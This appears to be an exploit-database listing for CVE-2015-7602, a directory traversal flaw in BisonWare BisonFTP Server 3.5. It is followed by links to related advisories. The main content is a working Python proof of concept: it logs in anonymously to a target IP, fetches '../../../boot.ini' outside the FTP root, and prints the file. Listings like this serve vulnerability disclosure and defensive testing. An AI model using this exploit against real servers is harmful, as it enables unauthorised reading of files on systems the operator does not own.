Lucene search
Jay TurlaEDB-ID:38341HistorySep 28, 2015 - 12:00 a.m.
BisonWare BisonFTP Server 3.5 - Directory Traversal
2015-09-2800:00:00
Jay Turla
www.exploit-db.com
44
AI Score
7.4
Confidence
Low
#!/usr/bin/python
# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar
# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC)
from ftplib import FTP
ftp = FTP(raw_input("Target IP: "))
ftp.login()
ftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"Related
metasploit
metasploit
BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
2015-11-08 05:34:10
prion
prion
Directory traversal
2015-09-29 19:59:00
cvelist
cvelist
CVE-2015-7602
2015-09-29 19:00:00
cve
cve
CVE-2015-7602
2015-09-29 19:59:10
openvas
openvas
BisonWare BisonFTP Server Directory Traversal Vulnerability
2015-09-29 00:00:00
nvd
nvd
CVE-2015-7602
2015-09-29 19:59:10
packetstorm
packetstorm
BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
2024-09-01 00:00:00